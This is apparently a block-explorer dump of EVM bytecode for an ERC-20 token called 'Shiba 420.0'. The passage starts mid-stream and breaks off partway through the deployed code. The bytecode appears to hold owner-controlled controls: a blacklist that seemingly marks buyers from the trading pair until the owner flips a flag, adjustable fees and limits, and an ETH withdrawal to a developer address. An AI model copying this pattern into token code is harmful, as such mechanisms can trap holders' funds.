480360381019061068e9190612fbb565b611189565b6040516106a09190612dbb565b60405180910390f35b3480156106b557600080fd5b506106d060048036038101906106cb9190612fbb565b6111a9565b6040516106dd9190612dbb565b60405180910390f35b3480156106f257600080fd5b5061070d60048036038101906107089190612d60565b6111c9565b60405161071a9190612dbb565b60405180910390f35b34801561072f57600080fd5b5061074a60048036038101906107459190612d60565b611240565b6040516107579190612dbb565b60405180910390f35b34801561076c57600080fd5b50610775611263565b6040516107829190612e50565b60405180910390f35b34801561079757600080fd5b506107a0611269565b6040516107b195949392919061315e565b60405180910390f35b3480156107c657600080fd5b506107cf61128d565b6040516107dc9190612e50565b60405180910390f35b3480156107f157600080fd5b5061080c60048036038101906108079190612f8e565b611293565b005b34801561081a57600080fd5b5061083560048036038101906108309190612fbb565b6112ef565b6040516108429190612dbb565b60405180910390f35b34801561085757600080fd5b5061086061130f565b60405161086d9190612e50565b60405180910390f35b34801561088257600080fd5b5061089d600480360381019061089891906131b1565b611315565b6040516108aa9190612e50565b60405180910390f35b3480156108bf57600080fd5b506108da60048036038101906108d59190612e97565b61139c565b005b3480156108e857600080fd5b506108f1611439565b60405161090295949392919061315e565b60405180910390f35b34801561091757600080fd5b50610932600480360381019061092d9190612fbb565b61145d565b005b34801561094057600080fd5b506109496114e0565b60405161095a95949392919061315e565b60405180910390f35b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606003805461099890613220565b80601f01602080910402602001604051908101604052809291908181526020018280546109c490613220565b8015610a115780601f106109e657610100808354040283529160200191610a11565b820191906000526020600020905b8154815290600101906020018083116109f457829003601f168201915b5050505050905090565b600080610a26611504565b9050610a3381858561150c565b600191505092915050565b610a466116d5565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f0f9ab6c7b3a29f5eca7cf80f42ea6b1262432064b221200268394c9a5e63569f60405160405180910390a3610af4600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610b70565b81600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550610b62600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610b70565b5050565b6000600254905090565b610b786116d5565b80601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600080610bde611504565b9050610beb858285611753565b610bf68585856117df565b60019150509392505050565b610c0a6116d5565b6001601760006101000a81548160ff021916908315150217905550565b6000600654821115610c6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c65906132c3565b60405180910390fd5b610c76611e09565b82610c819190613341565b9050919050565b60006012905090565b600080610c9c611504565b9050610cbd818585610cae8589611315565b610cb89190613372565b61150c565b600191505092915050565b60004790506000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051610d15906133d7565b60006040518083038185875af1925050503d8060008114610d52576040519150601f19603f3d011682016040523d82523d6000602084013e610d57565b606091505b5050809150505050565b600b5481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161480610df55750610dc6610fa5565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610e34576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2b9061345e565b60405180910390fd5b80601760036101000a81548160ff02191690831515021790555050565b60145481565b600a5481565b60106020528060005260406000206000915054906101000a900460ff1681565b6000606482610e8b30610eb8565b610e95919061347e565b610e9f9190613341565b90506000811115610eb457610eb381611e25565b5b5050565b6000610f02600e60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610c27565b9050919050565b610f116116d5565b610f1b60006121a9565b565b610f256116d5565b8015610f68578160186000820151816000015560208201518160010155604082015181600201556060820151816003015560808201518160040155905050610fa1565b81601d60008201518160000155602082015181600101556040820151816002015560608201518160030155608082015181600401559050505b5050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610fde90613220565b80601f016020809104026020016040519081016040528092919081815260200182805461100a90613220565b80156110575780601f1061102c57610100808354040283529160200191611057565b820191906000526020600020905b81548152906001019060200180831161103a57829003601f168201915b5050505050905090565b6110696116d5565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f194c6407864834414a3adaa18aab4cb81b733d5986a0c3b1e0fc9a8bccc0c0fb60405160405180910390a3611117600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000610b70565b81600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550611185600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001610b70565b5050565b60116020528060005260406000206000915054906101000a900460ff1681565b60126020528060005260406000206000915054906101000a900460ff1681565b6000806111d4611504565b905060006111e28286611315565b905083811015611227576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121e90613532565b60405180910390fd5b611234828686840361150c565b60019250505092915050565b60008061124b611504565b90506112588185856117df565b600191505092915050565b600c5481565b60228060000154908060010154908060020154908060030154908060040154905085565b60165481565b61129b6116d5565b80601760026101000a81548160ff0219169083151502179055507f53726dfcaf90650aa7eb35524f4d3220f07413c8d6cb404cc8c18bf5591bc159816040516112e49190612dbb565b60405180910390a150565b60136020528060005260406000206000915054906101000a900460ff1681565b60155481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6113a46116d5565b80601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015157f3159dadbd8e2d720a851b412e3358e7e44bb11734c9bfd5715340e21798e8b258360405161142d9190613143565b60405180910390a25050565b60188060000154908060010154908060020154908060030154908060040154905085565b6114656116d5565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036114d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114cb906135c4565b60405180910390fd5b6114dd816121a9565b50565b601d8060000154908060010154908060020154908060030154908060040154905085565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361157b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161157290613656565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e1906136e8565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116c89190612e50565b60405180910390a3505050565b6116dd611504565b73ffffffffffffffffffffffffffffffffffffffff166116fb610fa5565b73ffffffffffffffffffffffffffffffffffffffff1614611751576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161174890613754565b60405180910390fd5b565b600061175f8484611315565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146117d957818110156117cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117c2906137c0565b60405180910390fd5b6117d8848484840361150c565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361184e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161184590613852565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036118bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b4906138e4565b60405180910390fd5b601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561194a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194190613950565b60405180910390fd5b6000811161198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906139e2565b60405180910390fd5b61199683610eb8565b8111156119d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119cf90613a74565b60405180910390fd5b6000601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611a7b5750601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1590508015611c4657601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611bc657601760009054906101000a900460ff16611b43576001601060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b601860226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600b54821115611bc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bb890613ae0565b60405180910390fd5b611c45565b601d60226000820154816000015560018201548160010155600282015481600201556003820154816003015560048201548160040155905050600c54821115611c44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c3b90613b72565b60405180910390fd5b5b5b601760019054906101000a900460ff16158015611cad5750601360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015611cc55750601760029054906101000a900460ff165b8015611d045750611cd4610fa5565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611d435750611d13610fa5565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b8015611d9d5750600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611db35750600d54611db030610eb8565b10155b15611df7576001601760016101000a81548160ff021916908315150217905550611ddb61226f565b6000601760016101000a81548160ff0219169083151502179055505b611e03848484846122c3565b50505050565b6000611e13610b66565b600654611e209190613341565b905090565b6000602760040154602760030154602760020154611e439190613372565b611e4d9190613372565b905060008060028360276004015486611e66919061347e565b611e709190613341565b611e7a9190613341565b905060008185611e8a9190613b92565b90506000479050611e9a82612690565b60008147611ea89190613b92565b905060008660276003015483611ebe919061347e565b611ec89190613341565b905060008760276002015484611ede919061347e565b611ee89190613341565b90506000818385611ef99190613b92565b611f039190613b92565b905060276004015460156000828254611f1c9190613372565b92505081905550600060276004018190555060006027600201819055506000602760030181905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051611f8a906133d7565b60006040518083038185875af1925050503d8060008114611fc7576040519150601f19603f3d011682016040523d82523d6000602084013e611fcc565b606091505b505080985050600087118015611fe25750600081115b8015612001575060011515601760039054906101000a900460ff161515145b1561210f57600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71982308a600080600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b815260040161208f96959493929190613c22565b60606040518083038185885af11580156120ad573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906120d29190613c98565b5050507f38f8a0c92f4c5b0b6877f878cb4c0c8d348a47b76d716c8e78f425043df9515b8782604051612106929190613ceb565b60405180910390a15b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1683604051612155906133d7565b60006040518083038185875af1925050503d8060008114612192576040519150601f19603f3d011682016040523d82523d6000602084013e612197565b606091505b50508098505050505050505050505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061227a30610eb8565b9050600d548111156122c0576014600d54612295919061347e565b8111156122ae576014600d546122ab919061347e565b90505b6122bf6122ba30610eb8565b611e25565b5b50565b6122cb612b54565b6122d3612b54565b6122dd84846128a6565b809250819350505060008260c00151856122f79190613b92565b90506000612303611e09565b8661230e919061347e565b905060008360c00151826123229190613b92565b9050601260008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806123915750600a54836123848a610eb8565b61238e9190613372565b11155b6123d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123c790613d86565b60405180910390fd5b81600e60008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461241f9190613b92565b9250508190555080600e60008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546124759190613372565b925050819055508515612620578360000151600660008282546124989190613b92565b925050819055508460000151601460008282546124b59190613372565b925050819055506124c68585612a96565b600060226000015411156125b6578460200151601660008282546124ea9190613372565b925050819055508360200151600e60008073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546125449190613372565b92505081905550600073ffffffffffffffffffffffffffffffffffffffff163073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87602001516040516125ad9190612e50565b60405180910390a35b3073ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8760a001516040516126179190612e50565b60405180910390a35b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161267d9190612e50565b60405180910390a3505050505050505050565b6000600267ffffffffffffffff8111156126ad576126ac612fed565b5b6040519080825280602002602001820160405280156126db5781602001602082028036833780820191505090505b50905030816000815181106126f3576126f2613da6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561279a573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906127be9190613dea565b816001815181106127d2576127d1613da6565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612870959493929190613ed5565b600060405180830381600087803b15801561288a57600080fd5b505af115801561289e573d6000803e3d6000fd5b505050505050565b6128ae612b54565b6128b6612b54565b8215612a8f5760006128c6611e09565b90506064602260040154866128db919061347e565b6128e59190613341565b836000018181525050606460226000015486612901919061347e565b61290b9190613341565b836020018181525050606460226003015486612927919061347e565b6129319190613341565b83604001818152505060646022600201548661294d919061347e565b6129579190613341565b836060018181525050606460226001015486612973919061347e565b61297d9190613341565b83608001818152505082608001518360600151846040015161299f9190613372565b6129a99190613372565b8360a00181815250508260a00151836020015184600001516129cb9190613372565b6129d59190613372565b8360c00181815250508083600001516129ee919061347e565b826000018181525050808360200151612a07919061347e565b826020018181525050808360400151612a20919061347e565b826040018181525050808360600151612a39919061347e565b826060018181525050808360800151612a52919061347e565b826080018181525050808360c00151612a6b919061347e565b8260c0018181525050808360a00151612a84919061347e565b8260a0018181525050505b9250929050565b8060a00151600e60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612ae99190613372565b92505081905550816080015160276004016000828254612b099190613372565b92505081905550816040015160276002016000828254612b299190613372565b92505081905550816060015160276003016000828254612b499190613372565b925050819055505050565b6040518060e00160405280600081526020016000815260200160008152602001600081526020016000815260200160008152602001600081525090565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000612bd6612bd1612bcc84612b91565b612bb1565b612b91565b9050919050565b6000612be882612bbb565b9050919050565b6000612bfa82612bdd565b9050919050565b612c0a81612bef565b82525050565b6000602082019050612c256000830184612c01565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612c65578082015181840152602081019050612c4a565b60008484015250505050565b6000601f19601f8301169050919050565b6000612c8d82612c2b565b612c978185612c36565b9350612ca7818560208601612c47565b612cb081612c71565b840191505092915050565b60006020820190508181036000830152612cd58184612c82565b905092915050565b6000604051905090565b600080fd5b6000612cf782612b91565b9050919050565b612d0781612cec565b8114612d1257600080fd5b50565b600081359050612d2481612cfe565b92915050565b6000819050919050565b612d3d81612d2a565b8114612d4857600080fd5b50565b600081359050612d5a81612d34565b92915050565b60008060408385031215612d7757612d76612ce7565b5b6000612d8585828601612d15565b9250506020612d9685828601612d4b565b9150509250929050565b60008115159050919050565b612db581612da0565b82525050565b6000602082019050612dd06000830184612dac565b92915050565b6000612de182612b91565b9050919050565b612df181612dd6565b8114612dfc57600080fd5b50565b600081359050612e0e81612de8565b92915050565b600060208284031215612e2a57612e29612ce7565b5b6000612e3884828501612dff565b91505092915050565b612e4a81612d2a565b82525050565b6000602082019050612e656000830184612e41565b92915050565b612e7481612da0565b8114612e7f57600080fd5b50565b600081359050612e9181612e6b565b92915050565b60008060408385031215612eae57612ead612ce7565b5b6000612ebc85828601612d15565b9250506020612ecd85828601612e82565b9150509250929050565b600080600060608486031215612ef057612eef612ce7565b5b6000612efe86828701612d15565b9350506020612f0f86828701612d15565b9250506040612f2086828701612d4b565b9150509250925092565b600060208284031215612f4057612f3f612ce7565b5b6000612f4e84828501612d4b565b91505092915050565b600060ff82169050919050565b612f6d81612f57565b82525050565b6000602082019050612f886000830184612f64565b92915050565b600060208284031215612fa457612fa3612ce7565b5b6000612fb284828501612e82565b91505092915050565b600060208284031215612fd157612fd0612ce7565b5b6000612fdf84828501612d15565b91505092915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61302582612c71565b810181811067ffffffffffffffff8211171561304457613043612fed565b5b80604052505050565b6000613057612cdd565b9050613063828261301c565b919050565b600060a0828403121561307e5761307d612fe8565b5b61308860a061304d565b9050600061309884828501612d4b565b60008301525060206130ac84828501612d4b565b60208301525060406130c084828501612d4b565b60408301525060606130d484828501612d4b565b60608301525060806130e884828501612d4b565b60808301525092915050565b60008060c0838503121561310b5761310a612ce7565b5b600061311985828601613068565b92505060a061312a85828601612e82565b9150509250929050565b61313d81612cec565b82525050565b60006020820190506131586000830184613134565b92915050565b600060a0820190506131736000830188612e41565b6131806020830187612e41565b61318d6040830186612e41565b61319a6060830185612e41565b6131a76080830184612e41565b9695505050505050565b600080604083850312156131c8576131c7612ce7565b5b60006131d685828601612d15565b92505060206131e785828601612d15565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061323857607f821691505b60208210810361324b5761324a6131f1565b5b50919050565b7f416d6f756e74206d757374206265206c657373207468616e20746f74616c207260008201527f65666c656374696f6e7300000000000000000000000000000000000000000000602082015250565b60006132ad602a83612c36565b91506132b882613251565b604082019050919050565b600060208201905081810360008301526132dc816132a0565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061334c82612d2a565b915061335783612d2a565b925082613367576133666132e3565b5b828204905092915050565b600061337d82612d2a565b915061338883612d2a565b92508282019050808211156133a05761339f613312565b5b92915050565b600081905092915050565b50565b60006133c16000836133a6565b91506133cc826133b1565b600082019050919050565b60006133e2826133b4565b9150819050919050565b7f4f6e6c7920646576656c6f706572732063616e206368616e676520746869732060008201527f666c616700000000000000000000000000000000000000000000000000000000602082015250565b6000613448602483612c36565b9150613453826133ec565b604082019050919050565b600060208201905081810360008301526134778161343b565b9050919050565b600061348982612d2a565b915061349483612d2a565b92508282026134a281612d2a565b915082820484148315176134b9576134b8613312565b5b5092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061351c602583612c36565b9150613527826134c0565b604082019050919050565b6000602082019050818103600083015261354b8161350f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006135ae602683612c36565b91506135b982613552565b604082019050919050565b600060208201905081810360008301526135dd816135a1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000613640602483612c36565b915061364b826135e4565b604082019050919050565b6000602082019050818103600083015261366f81613633565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006136d2602283612c36565b91506136dd82613676565b604082019050919050565b60006020820190508181036000830152613701816136c5565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061373e602083612c36565b915061374982613708565b602082019050919050565b6000602082019050818103600083015261376d81613731565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006137aa601d83612c36565b91506137b582613774565b602082019050919050565b600060208201905081810360008301526137d98161379d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061383c602583612c36565b9150613847826137e0565b604082019050919050565b6000602082019050818103600083015261386b8161382f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006138ce602383612c36565b91506138d982613872565b604082019050919050565b600060208201905081810360008301526138fd816138c1565b9050919050565b7f45524332303a206164647265737320626c61636b6c69737465642028626f7429600082015250565b600061393a602083612c36565b915061394582613904565b602082019050919050565b600060208201905081810360008301526139698161392d565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006139cc602983612c36565b91506139d782613970565b604082019050919050565b600060208201905081810360008301526139fb816139bf565b9050919050565b7f596f752061726520747279696e6720746f207472616e73666572206d6f72652060008201527f7468616e20796f75722062616c616e6365000000000000000000000000000000602082015250565b6000613a5e603183612c36565b9150613a6982613a02565b604082019050919050565b60006020820190508181036000830152613a8d81613a51565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e74427579600082015250565b6000613aca602083612c36565b9150613ad582613a94565b602082019050919050565b60006020820190508181036000830152613af981613abd565b9050919050565b7f616d6f756e74206d757374206265203c3d206d61785478416d6f756e7453656c60008201527f6c00000000000000000000000000000000000000000000000000000000000000602082015250565b6000613b5c602183612c36565b9150613b6782613b00565b604082019050919050565b60006020820190508181036000830152613b8b81613b4f565b9050919050565b6000613b9d82612d2a565b9150613ba883612d2a565b9250828203905081811115613bc057613bbf613312565b5b92915050565b6000819050919050565b6000613beb613be6613be184613bc6565b612bb1565b612d2a565b9050919050565b613bfb81613bd0565b82525050565b6000613c0c82612bdd565b9050919050565b613c1c81613c01565b82525050565b600060c082019050613c376000830189613134565b613c446020830188612e41565b613c516040830187613bf2565b613c5e6060830186613bf2565b613c6b6080830185613c13565b613c7860a0830184612e41565b979650505050505050565b600081519050613c9281612d34565b92915050565b600080600060608486031215613cb157613cb0612ce7565b5b6000613cbf86828701613c83565b9350506020613cd086828701613c83565b9250506040613ce186828701613c83565b9150509250925092565b6000604082019050613d006000830185612e41565b613d0d6020830184612e41565b9392505050565b7f526563697069656e742063616e6e6f7420686f6c64206d6f7265207468616e2060008201527f6d617857616c6c6574416d6f756e740000000000000000000000000000000000602082015250565b6000613d70602f83612c36565b9150613d7b82613d14565b604082019050919050565b60006020820190508181036000830152613d9f81613d63565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050613de481612cfe565b92915050565b600060208284031215613e0057613dff612ce7565b5b6000613e0e84828501613dd5565b91505092915050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b613e4c81612cec565b82525050565b6000613e5e8383613e43565b60208301905092915050565b6000602082019050919050565b6000613e8282613e17565b613e8c8185613e22565b9350613e9783613e33565b8060005b83811015613ec8578151613eaf8882613e52565b9750613eba83613e6a565b925050600181019050613e9b565b5085935050505092915050565b600060a082019050613eea6000830188612e41565b613ef76020830187613bf2565b8181036040830152613f098186613e77565b9050613f186060830185613134565b613f256080830184612e41565b969550505050505056fea2646970667358221220ea60a74066af9482bbf2a90dddf9dbee5e825c4ed65ffab19607322d37a5830f64736f6c634300081200330000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000000b5368696261203432302e3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075348494234323000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x6080604052600436106102345760003560e01c8063715018a61161012e578063a9c21468116100ab578063dd62ed3e1161006f578063dd62ed3e14610876578063df2abc24146108b3578063f2bc6ea4146108dc578063f2fde38b1461090b578063fc962edb146109345761023b565b8063a9c214681461078b578063b897a7f2146107ba578063c49b9a80146107e5578063c59272071461080e578063d43ad1e91461084b5761023b565b80639b4f462d116100f25780639b4f462d1461066c5780639cc29950146106a9578063a457c2d7146106e6578063a9059cbb14610723578063a98aa6ee146107605761023b565b8063715018a6146105ad57806373f33bd3146105c45780638da5cb5b146105ed57806395d89b411461061857806399ec86fe146106435761023b565b8063313ce567116101bc5780634d3314f4116101805780634d3314f4146104b45780635040c6e7146104df578063570eafa71461050a57806368dc04c31461054757806370a08231146105705761023b565b8063313ce567146103e1578063395093511461040c5780633ccfd60b14610449578063407bf9c2146104605780634947a42c1461048b5761023b565b806318160ddd1161020357806318160ddd146102fc5780631850e44f1461032757806323b872dd1461035057806327b827041461038d5780632d838119146103a45761023b565b8063055add0d1461024057806306fdde031461026b578063095ea7b3146102965780630a4ea202146102d35761023b565b3661023b57005b600080fd5b34801561024c57600080fd5b50610255610963565b6040516102629190612c10565b60405180910390f35b34801561027757600080fd5b50610280610989565b60405161028d9190612cbb565b60405180910390f35b3480156102a257600080fd5b506102bd60048036038101906102b89190612d60565b610a1b565b6040516102ca9190612dbb565b60405180910390f35b3480156102df57600080fd5b506102fa60048036038101906102f59190612e14565b610a3e565b005b34801561030857600080fd5b50610311610b66565b60405161031e9190612e50565b60405180910390f35b34801561033357600080fd5b5061034e60048036038101906103499190612e97565b610b70565b005b34801561035c57600080fd5b5061037760048036038101906103729190612ed7565b610bd3565b6040516103849190612dbb565b60405180910390f35b34801561039957600080fd5b506103a2610c02565b005b3480156103b057600080fd5b506103cb60048036038101906103c69190612f2a565b610c27565b6040516103d89190612e50565b60405180910390f35b3480156103ed57600080fd5b506103f6610c88565b6040516104039190612f73565b60405180910390f35b34801561041857600080fd5b50610433600480360381019061042e9190612d60565b610c91565b6040516104409190612dbb565b60405180910390f35b34801561045557600080fd5b5061045e610cc8565b005b34801561046c57600080fd5b50610475610d61565b6040516104829190612e50565b60405180910390f35b34801561049757600080fd5b506104b260048036038101906104ad9190612f8e565b610d67565b005b3480156104c057600080fd5b506104c9610e51565b6040516104d69190612e50565b60405180910390f35b3480156104eb57600080fd5b506104f4610e57565b6040516105019190612e50565b60405180910390f35b34801561051657600080fd5b50610531600480360381019061052c9190612fbb565b610e5d565b60405161053e9190612dbb565b60405180910390f35b34801561055357600080fd5b5061056e60048036038101906105699190612f2a565b610e7d565b005b34801561057c57600080fd5b5061059760048036038101906105929190612fbb565b610eb8565b6040516105a49190612e50565b60405180910390f35b3480156105b957600080fd5b506105c2610f09565b005b3480156105d057600080fd5b506105eb60048036038101906105e691906130f4565b610f1d565b005b3480156105f957600080fd5b50610602610fa5565b60405161060f9190613143565b60405180910390f35b34801561062457600080fd5b5061062d610fcf565b60405161063a9190612cbb565b60405180910390f35b34801561064f57600080fd5b5061066a60048036038101906106659190612e14565b611061565b005b34801561067857600080fd5b50610693600480360381019061068e9190612fbb565b611189565b6040516106a09190612dbb565b60405180910390f35b3480156106b557600080fd5b506106d060048036038101906106cb9190612fbb565b6111a9565b6040516106dd9190612dbb565b60405180910390f35b3480156106f257600080fd5b5061070d60048036038101906107089190612d60565b6111c9565b60405161071a9190612dbb565b60405180910390f35b34801561072f57600080fd5b5061074a60048036038101906107459190612d60565b611240565b6040516107579190612dbb565b60405180910390f35b34801561076c57600080fd5b50610775611263565b6040516107829190612e50565b60405180910390f35b34801561079757600080fd5b506107a0611269565b6040516107b195949392919061315e565b60405180910390f35b3480156107c657600080fd5b506107cf61128d565b6040516107dc9190612e50565b60405180910390f35b3480156107f157600080fd5b5061080c6004